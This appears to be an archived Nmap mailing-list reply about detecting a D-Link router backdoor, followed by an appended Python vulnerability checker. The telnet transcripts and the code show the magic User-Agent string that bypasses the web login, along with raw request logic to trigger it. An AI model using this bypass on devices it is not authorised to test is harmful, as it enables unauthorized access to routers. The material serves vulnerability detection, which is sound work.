Nmap Development mailing list archives

Re: D-Link firmware backdoor


From: Michael Meyer <michael.meyer () greenbone net>
Date: Wed, 16 Oct 2013 13:49:58 +0200

*** Patrik Karlsson wrote:

Please find a script attached to detect the D-Link firmware bypass outlined
in this article:
http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/

It's been a while since I committed something, so I will wait for some
feedback before I do.

Just a note about...

and server:match("^thttpd%-alphanetworks"))

On some affected devices the server header is 'Server: Alpha_webserv'
instead of 'Server: thttpd-alphanetworks/'...

if ( response.status == 200 )

...and there are also some devices which do not send a header
at all when this fake user-agent is set. On such devices you
could check for the existence of 'self.location.href' after
successfully bypassing the login.

mime@kira[6]:~ (1)$ telnet 192.168.44.8 8080
Trying 192.168.44.8...
Connected to 192.168.44.8.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 401 Unauthorized
Server: thttpd-alphanetworks/2.23
Content-Type: text/html
Date: Tue, 15 Oct 2013 11:51:23 GMT
Last-Modified: Tue, 15 Oct 2013 11:51:23 GMT
Accept-Ranges: bytes
Connection: close
WWW-Authenticate: Basic realm="BRL-04UR"

<HTML><HEAD><TITLE>401 Unauthorized</TITLE>
[...]

mime@kira[6]:~ (1)$ telnet 192.168.44.8 8080
Trying 192.168.44.8...
Connected to 192.168.44.8.
Escape character is '^]'.
GET / HTTP/1.0
User-Agent: xmlset_roodkcableoj28840ybtide

<HTML>
<HEAD>
<TITLE>BRL-04UR</TITLE>
[...]
   self.location.href="index1.htm";
[...]

Micha

-- 
Michael Meyer                            OpenPGP Key: 52A6EFA6
http://www.greenbone.net/
Greenbone Networks GmbH, Neuer Graben 17, 49074 Osnabrück | AG
Osnabrück, HR B 202460
Geschäftsführer: Lukas Grunwald, Dr. Jan-Oliver Wagner
_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/
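The detection logic sketched in this reply (a baseline GET that yields 401, a second GET carrying the backdoor User-Agent, a Server header that may read either thttpd-alphanetworks or Alpha_webserv, and the header-less case where only the presence of self.location.href shows the login was bypassed) as a stand-alone Python checker. This is an added example, not Patrik's NSE script and not code from the thread; the function names, the verdict strings and the probe helper are my own, and the sample responses are constructed to mirror the two telnet transcripts above.

```python
import socket

# User-Agent that triggers the authentication bypass, as quoted in the thread.
BACKDOOR_UA = "xmlset_roodkcableoj28840ybtide"

# Server header prefixes reported for affected devices in this thread.
KNOWN_SERVERS = ("thttpd-alphanetworks", "Alpha_webserv")

# Constructed sample responses (not captured traffic), modeled on the transcripts.
BASELINE_401 = (
    b"HTTP/1.0 401 Unauthorized\r\n"
    b"Server: thttpd-alphanetworks/2.23\r\n"
    b"Content-Type: text/html\r\n"
    b"WWW-Authenticate: Basic realm=\"BRL-04UR\"\r\n"
    b"\r\n"
    b"<HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD></HTML>\r\n"
)
BACKDOOR_200 = (
    b"HTTP/1.0 200 OK\r\n"
    b"Server: Alpha_webserv\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<HTML><HEAD><TITLE>BRL-04UR</TITLE></HEAD></HTML>\r\n"
)
# Some devices answer the backdoor request with HTML only: no status line, no headers.
BACKDOOR_HEADERLESS = (
    b"<HTML>\r\n<HEAD>\r\n<TITLE>BRL-04UR</TITLE>\r\n"
    b"<script>\r\n   self.location.href=\"index1.htm\";\r\n</script>\r\n"
    b"</HEAD></HTML>\r\n"
)


def parse_response(raw):
    """Split a raw HTTP/1.0 reply into (status, headers, body).

    Returns status None and empty headers when the device sent no status
    line at all, which is the header-less case described in the thread."""
    text = raw.decode("latin-1", errors="replace")
    if not text.startswith("HTTP/"):
        return None, {}, text
    head, sep, body = text.partition("\r\n\r\n")
    if not sep:
        head, sep, body = text.partition("\n\n")
    lines = head.splitlines()
    try:
        status = int(lines[0].split()[1])
    except (IndexError, ValueError):
        status = None
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if colon:
            headers[name.strip().lower()] = value.strip()
    return status, headers, body


def server_matches(headers):
    """True if the Server header starts with one of the known affected banners."""
    server = headers.get("server", "")
    return any(server.startswith(prefix) for prefix in KNOWN_SERVERS)


def classify(baseline_raw, backdoor_raw):
    """Compare the plain reply with the backdoor-UA reply and return a verdict.

    'not_protected'        baseline was not 401, so there was nothing to bypass
    'vulnerable'           backdoor request got 200 from a known affected server
    'vulnerable_headerless' backdoor request got bare HTML containing the
                            post-login redirect self.location.href
    'not_vulnerable'       everything else"""
    b_status, b_headers, _ = parse_response(baseline_raw)
    d_status, d_headers, d_body = parse_response(backdoor_raw)
    if b_status != 401:
        return "not_protected"
    if d_status == 200 and (server_matches(d_headers) or server_matches(b_headers)):
        return "vulnerable"
    if d_status is None and "self.location.href" in d_body:
        return "vulnerable_headerless"
    return "not_vulnerable"


def probe(host, port=80, user_agent=None, timeout=5.0):
    """Send one raw HTTP/1.0 GET (as in the telnet transcripts) and return the reply.
    Hypothetical helper for live use; the assertions below never open a socket."""
    request = "GET / HTTP/1.0\r\n"
    if user_agent:
        request += "User-Agent: %s\r\n" % user_agent
    request += "\r\n"
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request.encode("ascii"))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def check_host(host, port=80):
    """Run both requests against a live device and classify the result."""
    return classify(probe(host, port), probe(host, port, BACKDOOR_UA))
```

The two-request structure matters: the baseline 401 proves the page is normally protected, so a 200 (or a bare HTML body with the post-login redirect) on the second request is attributable to the User-Agent and not to an unauthenticated default page.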
